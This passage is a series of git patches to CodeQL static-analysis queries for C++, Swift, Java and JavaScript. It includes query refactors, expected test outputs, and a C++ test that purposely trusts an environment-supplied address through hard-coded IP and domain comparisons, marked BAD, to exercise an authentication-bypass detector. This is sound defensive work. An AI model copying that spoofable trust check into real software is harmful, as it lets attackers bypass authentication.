C++: Fix spurious backticks. --- cpp/ql/src/Critical/MissingCheckScanf.ql | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cpp/ql/src/Critical/MissingCheckScanf.ql b/cpp/ql/src/Critical/MissingCheckScanf.ql index 5d81a3f9e49..fa507bc696a 100644 --- a/cpp/ql/src/Critical/MissingCheckScanf.ql +++ b/cpp/ql/src/Critical/MissingCheckScanf.ql @@ -72,7 +72,7 @@ predicate revFlow0(Instruction instr) { } /** - * Holds if `instr` is part of a path from a call `to a `scanf`-like function + * Holds if `instr` is part of a path from a call to a `scanf`-like function * that writes to a variable with value number `vn`, without passing through * redefinitions of the variable. */ @@ -91,7 +91,7 @@ private predicate fwdFlow(Instruction instr, ValueNumber vn) { } /** - * Holds if `instr` is part of a path from a call `to a `scanf`-like function + * Holds if `instr` is part of a path from a call to a `scanf`-like function * that writes to a variable with value number `vn`, without passing through * redefinitions of the variable. */ From 59072f9e81d7878d34f0e3c45855cfeeebbe3524 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 13 Jan 2023 11:01:23 +0000 Subject: [PATCH 272/381] C++: Improve QLDoc. --- cpp/ql/src/Critical/MissingCheckScanf.ql | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cpp/ql/src/Critical/MissingCheckScanf.ql b/cpp/ql/src/Critical/MissingCheckScanf.ql index fa507bc696a..994d5e42735 100644 --- a/cpp/ql/src/Critical/MissingCheckScanf.ql +++ b/cpp/ql/src/Critical/MissingCheckScanf.ql @@ -33,8 +33,8 @@ predicate isSource(ScanfFunctionCall call, int index, Instruction instr, ValueNu } /** - * Holds if `instr` is control-flow reachable in 0 or more steps from an a call - * to a call to a `scanf`-like function. + * Holds if `instr` is control-flow reachable in 0 or more steps from + * a call to a `scanf`-like function. */ pragma[nomagic] predicate fwdFlow0(Instruction instr) { @@ -94,6 +94,9 @@ private predicate fwdFlow(Instruction instr, ValueNumber vn) { * Holds if `instr` is part of a path from a call to a `scanf`-like function * that writes to a variable with value number `vn`, without passing through * redefinitions of the variable. + * + * Note: This predicate only holds for the `(intr, vn)` pairs that are also + * control-flow reachable from an argument to a `scanf`-like function call. */ pragma[nomagic] predicate revFlow(Instruction instr, ValueNumber vn) { From 2283eacc0b9875feec0230e8fc8082bfa0d95383 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 13 Jan 2023 11:42:15 +0000 Subject: [PATCH 273/381] C++: Fix bad join in 'definitionOf'. --- cpp/ql/lib/definitions.qll | 15 ++++++++++----- cpp/ql/lib/semmle/code/cpp/Location.qll | 2 ++ 2 files changed, 12 insertions(+), 5 deletions(-) diff --git a/cpp/ql/lib/definitions.qll b/cpp/ql/lib/definitions.qll index 662cb5ed877..1eee3804359 100644 --- a/cpp/ql/lib/definitions.qll +++ b/cpp/ql/lib/definitions.qll @@ -123,6 +123,13 @@ private predicate constructorCallTypeMention(ConstructorCall cc, TypeMention tm) ) } +/** Holds if `loc` has the container `container` and is on the line starting at `startLine`. */ +pragma[nomagic] +private predicate hasContainerAndStartLine(Location loc, Container container, int startLine) { + loc.getStartLine() = startLine and + loc.getContainer() = container +} + /** * Gets an element, of kind `kind`, that element `e` uses, if any. * Attention: This predicate yields multiple definitions for a single location. @@ -184,11 +191,9 @@ Top definitionOf(Top e, string kind) { kind = "I" and result = e.(Include).getIncludedFile() and // exclude `#include` directives containing macros - not exists(MacroInvocation mi, Location l1, Location l2 | - l1 = e.(Include).getLocation() and - l2 = mi.getLocation() and - l1.getContainer() = l2.getContainer() and - l1.getStartLine() = l2.getStartLine() + not exists(MacroInvocation mi, Container container, int startLine | + hasContainerAndStartLine(e.(Include).getLocation(), container, startLine) and + hasContainerAndStartLine(mi.getLocation(), container, startLine) // (an #include directive must be always on it's own line) ) ) and diff --git a/cpp/ql/lib/semmle/code/cpp/Location.qll b/cpp/ql/lib/semmle/code/cpp/Location.qll index 2b2a06ac474..fd5d2d34c5d 100644 --- a/cpp/ql/lib/semmle/code/cpp/Location.qll +++ b/cpp/ql/lib/semmle/code/cpp/Location.qll @@ -10,12 +10,14 @@ import semmle.code.cpp.File */ class Location extends @location { /** Gets the container corresponding to this location. */ + pragma[nomagic] Container getContainer() { this.fullLocationInfo(result, _, _, _, _) } /** Gets the file corresponding to this location, if any. */ File getFile() { result = this.getContainer() } /** Gets the 1-based line number (inclusive) where this location starts. */ + pragma[nomagic] int getStartLine() { this.fullLocationInfo(_, result, _, _, _) } /** Gets the 1-based column number (inclusive) where this location starts. */ From 71af8ab02281f1021455dfee355c2f5ccf990179 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Fri, 13 Jan 2023 13:18:52 +0100 Subject: [PATCH 274/381] simplifications inspired by review --- javascript/ql/lib/semmle/javascript/ApiGraphs.qll | 7 +------ .../UnsafeShellCommandConstructionCustomizations.qll | 2 +- 2 files changed, 2 insertions(+), 7 deletions(-) diff --git a/javascript/ql/lib/semmle/javascript/ApiGraphs.qll b/javascript/ql/lib/semmle/javascript/ApiGraphs.qll index 80a5487943a..3e708098635 100644 --- a/javascript/ql/lib/semmle/javascript/ApiGraphs.qll +++ b/javascript/ql/lib/semmle/javascript/ApiGraphs.qll @@ -210,12 +210,7 @@ module API { * This is similar to `asSink()` but additionally includes nodes that transitively reach a sink by data flow. * See `asSink()` for examples. */ - DataFlow::Node getAValueReachingSink() { - result = Impl::trackDefNode(this.asSink()) - or - // in case `asSink()` is not a `SourceNode`. - result = this.asSink() - } + DataFlow::Node getAValueReachingSink() { result = Impl::trackDefNode(this.asSink()) } /** DEPRECATED. This predicate has been renamed to `asSink`. */ deprecated DataFlow::Node getARhs() { result = this.asSink() } diff --git a/javascript/ql/lib/semmle/javascript/security/dataflow/UnsafeShellCommandConstructionCustomizations.qll b/javascript/ql/lib/semmle/javascript/security/dataflow/UnsafeShellCommandConstructionCustomizations.qll index 6a2b4d94f35..3b140fa4a9f 100644 --- a/javascript/ql/lib/semmle/javascript/security/dataflow/UnsafeShellCommandConstructionCustomizations.qll +++ b/javascript/ql/lib/semmle/javascript/security/dataflow/UnsafeShellCommandConstructionCustomizations.qll @@ -169,7 +169,7 @@ module UnsafeShellCommandConstruction { or exists(API::Node node | node.asSink() = sys.getOptionsArg() and - node.getMember("shell").getAValueReachingSink().mayHaveBooleanValue(true) + node.getMember("shell").asSink().mayHaveBooleanValue(true) ) } From 8a77906296ba2b5184f7cfc9f4cd831c0df26ec2 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 13 Jan 2023 10:10:38 +0000 Subject: [PATCH 275/381] Swift: Use Ssa::Definition rather than ConcreteVarDecl. --- .../swift/dataflow/internal/DataFlowPrivate.qll | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll b/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll index 36eda5c0055..c2271265423 100644 --- a/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll +++ b/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll @@ -119,6 +119,13 @@ private module Cached { def.(Ssa::WriteDefinition).assigns(nodeFrom.getCfgNode()) and nodeTo.asDefinition() = def or + // flow through optional binding `if let`, similarly to assignment + exists(ConditionElement ce | + ce.getInitializer() = nodeFrom.asExpr() and + ce.getPattern() = def.getSourceVariable().getParentPattern() and + nodeTo.asDefinition() = def + ) + or // step from def to first read nodeFrom.asDefinition() = def and nodeTo.getCfgNode() = def.getAFirstRead() and @@ -153,13 +160,6 @@ private module Cached { or nodeFrom.asExpr() = nodeTo.asExpr().(OptionalEvaluationExpr).getSubExpr() or - // flow through optional binding `if let` - exists(ConditionElement ce, ConcreteVarDecl v | - ce.getInitializer() = nodeFrom.asExpr() and - ce.getPattern() = v.getParentPattern() and - nodeTo.asDefinition().getSourceVariable() = v - ) - or // flow through nil-coalescing operator `??` exists(BinaryExpr nco | nco.getOperator().(FreeFunctionDecl).getName() = "??(_:_:)" and From 2c35af51cd694a3456f6b8de4283b5f899df32da Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 13 Jan 2023 15:06:08 +0000 Subject: [PATCH 276/381] Swift: Move logic into Ssa::WriteDefinition.assigns. --- swift/ql/lib/codeql/swift/dataflow/Ssa.qll | 8 ++++++++ .../codeql/swift/dataflow/internal/DataFlowPrivate.qll | 7 ------- 2 files changed, 8 insertions(+), 7 deletions(-) diff --git a/swift/ql/lib/codeql/swift/dataflow/Ssa.qll b/swift/ql/lib/codeql/swift/dataflow/Ssa.qll index c7cfab80398..e19502d6ffd 100644 --- a/swift/ql/lib/codeql/swift/dataflow/Ssa.qll +++ b/swift/ql/lib/codeql/swift/dataflow/Ssa.qll @@ -165,6 +165,14 @@ module Ssa { // TODO: We should probably enumerate more cfg nodes here. value.(PropertyGetterCfgNode).getRef() = init ) + or + exists(VarDecl var, SsaInput::BasicBlock bb, int blockIndex, ConditionElement ce, Expr init | + this.definesAt(var, bb, blockIndex) and + ce.getPattern() = bb.getNode(blockIndex).getNode().asAstNode() and + init = ce.getInitializer() + | + value.getNode().asAstNode() = init + ) } } diff --git a/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll b/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll index c2271265423..9a8b64af131 100644 --- a/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll +++ b/swift/ql/lib/codeql/swift/dataflow/internal/DataFlowPrivate.qll @@ -119,13 +119,6 @@ private module Cached { def.(Ssa::WriteDefinition).assigns(nodeFrom.getCfgNode()) and nodeTo.asDefinition() = def or - // flow through optional binding `if let`, similarly to assignment - exists(ConditionElement ce | - ce.getInitializer() = nodeFrom.asExpr() and - ce.getPattern() = def.getSourceVariable().getParentPattern() and - nodeTo.asDefinition() = def - ) - or // step from def to first read nodeFrom.asDefinition() = def and nodeTo.getCfgNode() = def.getAFirstRead() and From c9a00677054983f6d027cafbd1341a3e9827fc56 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 13 Jan 2023 16:33:50 +0000 Subject: [PATCH 277/381] Swift: Remove flow in cases with multiple variables. --- swift/ql/lib/codeql/swift/dataflow/Ssa.qll | 3 ++- .../library-tests/dataflow/dataflow/DataFlow.expected | 7 ------- .../library-tests/dataflow/dataflow/LocalFlow.expected | 8 -------- swift/ql/test/library-tests/dataflow/dataflow/test.swift | 4 ++-- 4 files changed, 4 insertions(+), 18 deletions(-) diff --git a/swift/ql/lib/codeql/swift/dataflow/Ssa.qll b/swift/ql/lib/codeql/swift/dataflow/Ssa.qll index e19502d6ffd..2d357c36062 100644 --- a/swift/ql/lib/codeql/swift/dataflow/Ssa.qll +++ b/swift/ql/lib/codeql/swift/dataflow/Ssa.qll @@ -169,7 +169,8 @@ module Ssa { exists(VarDecl var, SsaInput::BasicBlock bb, int blockIndex, ConditionElement ce, Expr init | this.definesAt(var, bb, blockIndex) and ce.getPattern() = bb.getNode(blockIndex).getNode().asAstNode() and - init = ce.getInitializer() + init = ce.getInitializer() and + strictcount(Ssa::WriteDefinition alt | alt.definesAt(_, bb, blockIndex)) = 1 // exclude cases where there are multiple writes from the same pattern, this is at best taint flow. | value.getNode().asAstNode() = init ) diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected index c1a30e3b551..2dd7b91a58b 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected @@ -142,8 +142,6 @@ edges | test.swift:360:15:360:15 | t2 [Tuple element at index 0] : | test.swift:360:15:360:18 | .0 | | test.swift:361:15:361:15 | t2 [Tuple element at index 1] : | test.swift:361:15:361:18 | .1 | | test.swift:439:13:439:28 | call to optionalSource() : | test.swift:442:19:442:19 | a | -| test.swift:455:21:455:29 | call to source2() : | test.swift:456:19:456:19 | x | -| test.swift:455:21:455:29 | call to source2() : | test.swift:457:19:457:19 | y | nodes | file://:0:0:0:0 | .a [x] : | semmle.label | .a [x] : | | file://:0:0:0:0 | .x : | semmle.label | .x : | @@ -302,9 +300,6 @@ nodes | test.swift:361:15:361:18 | .1 | semmle.label | .1 | | test.swift:439:13:439:28 | call to optionalSource() : | semmle.label | call to optionalSource() : | | test.swift:442:19:442:19 | a | semmle.label | a | -| test.swift:455:21:455:29 | call to source2() : | semmle.label | call to source2() : | -| test.swift:456:19:456:19 | x | semmle.label | x | -| test.swift:457:19:457:19 | y | semmle.label | y | subpaths | test.swift:75:21:75:22 | &... : | test.swift:65:16:65:28 | arg1 : | test.swift:65:1:70:1 | arg2[return] : | test.swift:75:31:75:32 | [post] &... : | | test.swift:114:19:114:19 | arg : | test.swift:109:9:109:14 | arg : | test.swift:110:12:110:12 | arg : | test.swift:114:12:114:22 | call to ... : | @@ -386,5 +381,3 @@ subpaths | test.swift:360:15:360:18 | .0 | test.swift:351:18:351:25 | call to source() : | test.swift:360:15:360:18 | .0 | result | | test.swift:361:15:361:18 | .1 | test.swift:351:31:351:38 | call to source() : | test.swift:361:15:361:18 | .1 | result | | test.swift:442:19:442:19 | a | test.swift:259:12:259:19 | call to source() : | test.swift:442:19:442:19 | a | result | -| test.swift:456:19:456:19 | x | test.swift:455:21:455:29 | call to source2() : | test.swift:456:19:456:19 | x | result | -| test.swift:457:19:457:19 | y | test.swift:455:21:455:29 | call to source2() : | test.swift:457:19:457:19 | y | result | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected index da400552ce2..d6b8811b6f9 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected @@ -327,8 +327,6 @@ | test.swift:387:32:387:32 | a | test.swift:390:37:390:37 | a | | test.swift:390:13:390:33 | SSA def(x) | test.swift:391:19:391:19 | x | | test.swift:390:13:390:33 | SSA def(y) | test.swift:392:19:392:19 | y | -| test.swift:390:37:390:37 | a | test.swift:390:13:390:33 | SSA def(x) | -| test.swift:390:37:390:37 | a | test.swift:390:13:390:33 | SSA def(y) | | test.swift:390:37:390:37 | a | test.swift:407:32:407:32 | a | | test.swift:395:9:395:13 | SSA def(b) | test.swift:397:12:397:12 | b | | test.swift:395:22:395:40 | call to ... | test.swift:395:9:395:13 | SSA def(b) | @@ -340,8 +338,6 @@ | test.swift:407:32:407:32 | a | test.swift:410:37:410:37 | a | | test.swift:410:13:410:33 | SSA def(x) | test.swift:411:19:411:19 | x | | test.swift:410:13:410:33 | SSA def(y) | test.swift:412:19:412:19 | y | -| test.swift:410:37:410:37 | a | test.swift:410:13:410:33 | SSA def(x) | -| test.swift:410:37:410:37 | a | test.swift:410:13:410:33 | SSA def(y) | | test.swift:410:37:410:37 | a | test.swift:427:32:427:32 | a | | test.swift:415:9:415:9 | SSA def(c) | test.swift:417:12:417:12 | c | | test.swift:415:13:415:38 | call to ... | test.swift:415:9:415:9 | SSA def(c) | @@ -353,8 +349,6 @@ | test.swift:427:32:427:32 | a | test.swift:430:37:430:37 | a | | test.swift:430:13:430:33 | SSA def(x) | test.swift:431:19:431:19 | x | | test.swift:430:13:430:33 | SSA def(y) | test.swift:432:19:432:19 | y | -| test.swift:430:37:430:37 | a | test.swift:430:13:430:33 | SSA def(x) | -| test.swift:430:37:430:37 | a | test.swift:430:13:430:33 | SSA def(y) | | test.swift:438:21:438:27 | SSA def(y) | test.swift:441:27:441:27 | y | | test.swift:438:21:438:27 | SSA def(y) | test.swift:446:22:446:22 | y | | test.swift:438:21:438:27 | y | test.swift:438:21:438:27 | SSA def(y) | @@ -372,5 +366,3 @@ | test.swift:448:10:448:37 | SSA def(b) | test.swift:450:19:450:19 | b | | test.swift:455:8:455:17 | SSA def(x) | test.swift:456:19:456:19 | x | | test.swift:455:8:455:17 | SSA def(y) | test.swift:457:19:457:19 | y | -| test.swift:455:21:455:29 | call to source2() | test.swift:455:8:455:17 | SSA def(x) | -| test.swift:455:21:455:29 | call to source2() | test.swift:455:8:455:17 | SSA def(y) | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/test.swift b/swift/ql/test/library-tests/dataflow/dataflow/test.swift index 400b3c05bf6..c4f09faaf73 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/test.swift +++ b/swift/ql/test/library-tests/dataflow/dataflow/test.swift @@ -453,7 +453,7 @@ func testOptionals2(y: Int?) { } if let (x, y) = source2() { - sink(arg: x) // $ flow=455 - sink(arg: y) // $ flow=455 + sink(arg: x) // (taint but not data flow) + sink(arg: y) // (taint but not data flow) } } From fb6725ddaa4a62466b23046c36a686cee7e00da4 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Fri, 13 Jan 2023 13:19:54 -0500 Subject: [PATCH 278/381] Java: add WithoutElement comment for clear methods --- java/ql/lib/ext/java.util.model.yml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/java/ql/lib/ext/java.util.model.yml b/java/ql/lib/ext/java.util.model.yml index df75f791ced..bef47b5665e 100644 --- a/java/ql/lib/ext/java.util.model.yml +++ b/java/ql/lib/ext/java.util.model.yml @@ -370,11 +370,9 @@ extensions: - ["java.util", "Collections", "emptyMap", "()", "manual"] - ["java.util", "Collections", "emptySet", "()", "manual"] - ["java.util", "Iterator", "hasNext", "()", "manual"] - - ["java.util", "List", "clear", "()", "manual"] - ["java.util", "List", "contains", "(Object)", "manual"] - ["java.util", "List", "isEmpty", "()", "manual"] - ["java.util", "List", "size", "()", "manual"] - - ["java.util", "Map", "clear", "()", "manual"] - ["java.util", "Map", "containsKey", "(Object)", "manual"] - ["java.util", "Map", "isEmpty", "()", "manual"] - ["java.util", "Map", "size", "()", "manual"] @@ -389,6 +387,11 @@ extensions: - ["java.util", "UUID", "randomUUID", "()", "manual"] - ["java.util", "UUID", "toString", "()", "manual"] + # The below APIs are currently being stored as neutral models since `WithoutElement` has not yet been implemented for Java. + # When `WithoutElement` is implemented, these should be changed to summary models of the form `Argument[-1].WithoutElement -> Argument[-1]`. + - ["java.util", "List", "clear", "()", "manual"] + - ["java.util", "Map", "clear", "()", "manual"] + # The below APIs have numeric flow and are currently being stored as neutral models. # These may be changed to summary models with kinds "value-numeric" and "taint-numeric" (or similar) in the future. - ["java.util", "Date", "Date", "(long)", "manual"] # taint-numeric From 13ae15b867a2bb8a1ffe2c49b40393a14dac4f14 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 13 Jan 2023 18:34:56 +0000 Subject: [PATCH 279/381] C++: Add tests for more edge cases. --- .../AuthenticationBypass.expected | 32 +++++++++++++++++++ .../semmle/AuthenticationBypass/test.cpp | 24 ++++++++++++++ 2 files changed, 56 insertions(+) diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected index ef28e08058d..fdc76862fe9 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected @@ -17,6 +17,24 @@ edges | test.cpp:38:25:38:42 | (const char *)... | test.cpp:42:14:42:20 | address | | test.cpp:38:25:38:42 | (const char *)... | test.cpp:42:14:42:20 | address | | test.cpp:38:25:38:42 | (const char *)... | test.cpp:42:14:42:20 | address indirection | +| test.cpp:49:25:49:30 | call to getenv | test.cpp:52:14:52:20 | address | +| test.cpp:49:25:49:30 | call to getenv | test.cpp:52:14:52:20 | address | +| test.cpp:49:25:49:30 | call to getenv | test.cpp:52:14:52:20 | address indirection | +| test.cpp:49:25:49:30 | call to getenv | test.cpp:56:14:56:20 | address | +| test.cpp:49:25:49:30 | call to getenv | test.cpp:56:14:56:20 | address | +| test.cpp:49:25:49:30 | call to getenv | test.cpp:56:14:56:20 | address indirection | +| test.cpp:49:25:49:30 | call to getenv | test.cpp:60:14:60:20 | address | +| test.cpp:49:25:49:30 | call to getenv | test.cpp:60:14:60:20 | address | +| test.cpp:49:25:49:30 | call to getenv | test.cpp:60:14:60:20 | address indirection | +| test.cpp:49:25:49:42 | (const char *)... | test.cpp:52:14:52:20 | address | +| test.cpp:49:25:49:42 | (const char *)... | test.cpp:52:14:52:20 | address | +| test.cpp:49:25:49:42 | (const char *)... | test.cpp:52:14:52:20 | address indirection | +| test.cpp:49:25:49:42 | (const char *)... | test.cpp:56:14:56:20 | address | +| test.cpp:49:25:49:42 | (const char *)... | test.cpp:56:14:56:20 | address | +| test.cpp:49:25:49:42 | (const char *)... | test.cpp:56:14:56:20 | address indirection | +| test.cpp:49:25:49:42 | (const char *)... | test.cpp:60:14:60:20 | address | +| test.cpp:49:25:49:42 | (const char *)... | test.cpp:60:14:60:20 | address | +| test.cpp:49:25:49:42 | (const char *)... | test.cpp:60:14:60:20 | address indirection | subpaths nodes | test.cpp:16:25:16:30 | call to getenv | semmle.label | call to getenv | @@ -34,7 +52,21 @@ nodes | test.cpp:42:14:42:20 | address | semmle.label | address | | test.cpp:42:14:42:20 | address | semmle.label | address | | test.cpp:42:14:42:20 | address indirection | semmle.label | address indirection | +| test.cpp:49:25:49:30 | call to getenv | semmle.label | call to getenv | +| test.cpp:49:25:49:42 | (const char *)... | semmle.label | (const char *)... | +| test.cpp:52:14:52:20 | address | semmle.label | address | +| test.cpp:52:14:52:20 | address | semmle.label | address | +| test.cpp:52:14:52:20 | address indirection | semmle.label | address indirection | +| test.cpp:56:14:56:20 | address | semmle.label | address | +| test.cpp:56:14:56:20 | address | semmle.label | address | +| test.cpp:56:14:56:20 | address indirection | semmle.label | address indirection | +| test.cpp:60:14:60:20 | address | semmle.label | address | +| test.cpp:60:14:60:20 | address | semmle.label | address | +| test.cpp:60:14:60:20 | address indirection | semmle.label | address indirection | #select | test.cpp:20:7:20:12 | call to strcmp | test.cpp:16:25:16:30 | call to getenv | test.cpp:20:14:20:20 | address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:16:25:16:30 | call to getenv | call to getenv | | test.cpp:31:7:31:12 | call to strcmp | test.cpp:27:25:27:30 | call to getenv | test.cpp:31:14:31:20 | address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:27:25:27:30 | call to getenv | call to getenv | | test.cpp:42:7:42:12 | call to strcmp | test.cpp:38:25:38:30 | call to getenv | test.cpp:42:14:42:20 | address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:38:25:38:30 | call to getenv | call to getenv | +| test.cpp:52:7:52:12 | call to strcmp | test.cpp:49:25:49:30 | call to getenv | test.cpp:52:14:52:20 | address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:30 | call to getenv | call to getenv | +| test.cpp:56:7:56:12 | call to strcmp | test.cpp:49:25:49:30 | call to getenv | test.cpp:56:14:56:20 | address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:30 | call to getenv | call to getenv | +| test.cpp:60:7:60:12 | call to strcmp | test.cpp:49:25:49:30 | call to getenv | test.cpp:60:14:60:20 | address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:30 | call to getenv | call to getenv | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/test.cpp index 8ca3514055b..72b9155cb84 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/test.cpp @@ -43,3 +43,27 @@ void processRequest3() isServer = 1; } } + +void processRequest4() +{ + const char *address = getenv("SERVERIP"); + bool cond = false; + + if (strcmp(address, "127.0.0.1")) { cond = true; } // BAD + if (strcmp(address, "127_0_0_1")) { cond = true; } // GOOD (not an IP) + if (strcmp(address, "127.0.0")) { cond = true; } // GOOD (not an IP) + if (strcmp(address, "127.0.0.0.1")) { cond = true; } // GOOD (not an IP) + if (strcmp(address, "http://mycompany")) { cond = true; } // BAD + if (strcmp(address, "http_//mycompany")) { cond = true; } // GOOD (not an address) + if (strcmp(address, "htt://mycompany")) { cond = true; } // GOOD (not an address) + if (strcmp(address, "httpp://mycompany")) { cond = true; } // GOOD (not an address) + if (strcmp(address, "mycompany.com")) { cond = true; } // BAD + if (strcmp(address, "mycompany_com")) { cond = true; } // GOOD (not an address) + if (strcmp(address, "mycompany.c")) { cond = true; } // GOOD (not an address) + if (strcmp(address, "mycompany.comm")) { cond = true; } // GOOD (not an address) + + if (cond) { + isServer = 1; + } +} + From 2f09f0e2c12b9515e902292663c3b8b9fae564b0 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 13 Jan 2023 18:47:18 +0000 Subject: [PATCH 280/381] C++: Turn the huge list into a predicate. --- .../CWE/CWE-290/AuthenticationBypass.ql | 74 +++---------------- 1 file changed, 12 insertions(+), 62 deletions(-) diff --git a/cpp/ql/src/Security/CWE/CWE-290/AuthenticationBypass.ql b/cpp/ql/src/Security/CWE/CWE-290/AuthenticationBypass.ql index 06c4ee5efe5..f0615b9979f 100644 --- a/cpp/ql/src/Security/CWE/CWE-290/AuthenticationBypass.ql +++ b/cpp/ql/src/Security/CWE/CWE-290/AuthenticationBypass.ql @@ -15,6 +15,17 @@ import semmle.code.cpp.ir.dataflow.internal.DefaultTaintTrackingImpl import TaintedWithPath +string getATopLevelDomain() { + result = + [ + "com", "ru", "net", "org", "de", "jp", "uk", "br", "pl", "in", "it", "fr", "au", "info", "nl", + "cn", "ir", "es", "cz", "biz", "ca", "eu", "ua", "kr", "za", "co", "gr", "ro", "se", "tw", + "vn", "mx", "ch", "tr", "at", "be", "hu", "tv", "dk", "me", "ar", "us", "no", "sk", "fi", + "id", "cl", "nz", "by", "xyz", "pt", "ie", "il", "kz", "my", "hk", "lt", "cc", "sg", "io", + "edu", "gov" + ] +} + predicate hardCodedAddressOrIP(StringLiteral txt) { exists(string s | s = txt.getValueText() | // Hard-coded ip addresses, such as 127.0.0.1 @@ -23,68 +34,7 @@ predicate hardCodedAddressOrIP(StringLiteral txt) { s.matches("\"www.%\"") or s.matches("\"http:%\"") or s.matches("\"https:%\"") or - s.matches("\"%.com\"") or - s.matches("\"%.ru\"") or - s.matches("\"%.net\"") or - s.matches("\"%.org\"") or - s.matches("\"%.de\"") or - s.matches("\"%.jp\"") or - s.matches("\"%.uk\"") or - s.matches("\"%.br\"") or - s.matches("\"%.pl\"") or - s.matches("\"%.in\"") or - s.matches("\"%.it\"") or - s.matches("\"%.fr\"") or - s.matches("\"%.au\"") or - s.matches("\"%.info\"") or - s.matches("\"%.nl\"") or - s.matches("\"%.cn\"") or - s.matches("\"%.ir\"") or - s.matches("\"%.es\"") or - s.matches("\"%.cz\"") or - s.matches("\"%.biz\"") or - s.matches("\"%.ca\"") or - s.matches("\"%.eu\"") or - s.matches("\"%.ua\"") or - s.matches("\"%.kr\"") or - s.matches("\"%.za\"") or - s.matches("\"%.co\"") or - s.matches("\"%.gr\"") or - s.matches("\"%.ro\"") or - s.matches("\"%.se\"") or - s.matches("\"%.tw\"") or - s.matches("\"%.vn\"") or - s.matches("\"%.mx\"") or - s.matches("\"%.ch\"") or - s.matches("\"%.tr\"") or - s.matches("\"%.at\"") or - s.matches("\"%.be\"") or - s.matches("\"%.hu\"") or - s.matches("\"%.tv\"") or - s.matches("\"%.dk\"") or - s.matches("\"%.me\"") or - s.matches("\"%.ar\"") or - s.matches("\"%.us\"") or - s.matches("\"%.no\"") or - s.matches("\"%.sk\"") or - s.matches("\"%.fi\"") or - s.matches("\"%.id\"") or - s.matches("\"%.cl\"") or - s.matches("\"%.nz\"") or - s.matches("\"%.by\"") or - s.matches("\"%.xyz\"") or - s.matches("\"%.pt\"") or - s.matches("\"%.ie\"") or - s.matches("\"%.il\"") or - s.matches("\"%.kz\"") or - s.matches("\"%.my\"") or - s.matches("\"%.hk\"") or - s.matches("\"%.lt\"") or - s.matches("\"%.cc\"") or - s.matches("\"%.sg\"") or - s.matches("\"%.io\"") or - s.matches("\"%.edu\"") or - s.matches("\"%.gov\"") + s.regexpMatch("\".*\\." + getATopLevelDomain() + "\"") ) } From 316117f5c9f56b9a8a13378a4f7144fca98d10bc Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 13 Jan 2023 18:50:30 +0000 Subject: [PATCH 281/381] C++: Reduce number of regexps. --- cpp/ql/src/Security/CWE/CWE-290/AuthenticationBypass.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/src/Security/CWE/CWE-290/AuthenticationBypass.ql b/cpp/ql/src/Security/CWE/CWE-290/AuthenticationBypass.ql index f0615b9979f..40aae5e2cfa 100644 --- a/cpp/ql/src/Security/CWE/CWE-290/AuthenticationBypass.ql +++ b/cpp/ql/src/Security/CWE/CWE-290/AuthenticationBypass.ql @@ -34,7 +34,7 @@ predicate hardCodedAddressOrIP(StringLiteral txt) { s.matches("\"www.%\"") or s.matches("\"http:%\"") or s.matches("\"https:%\"") or - 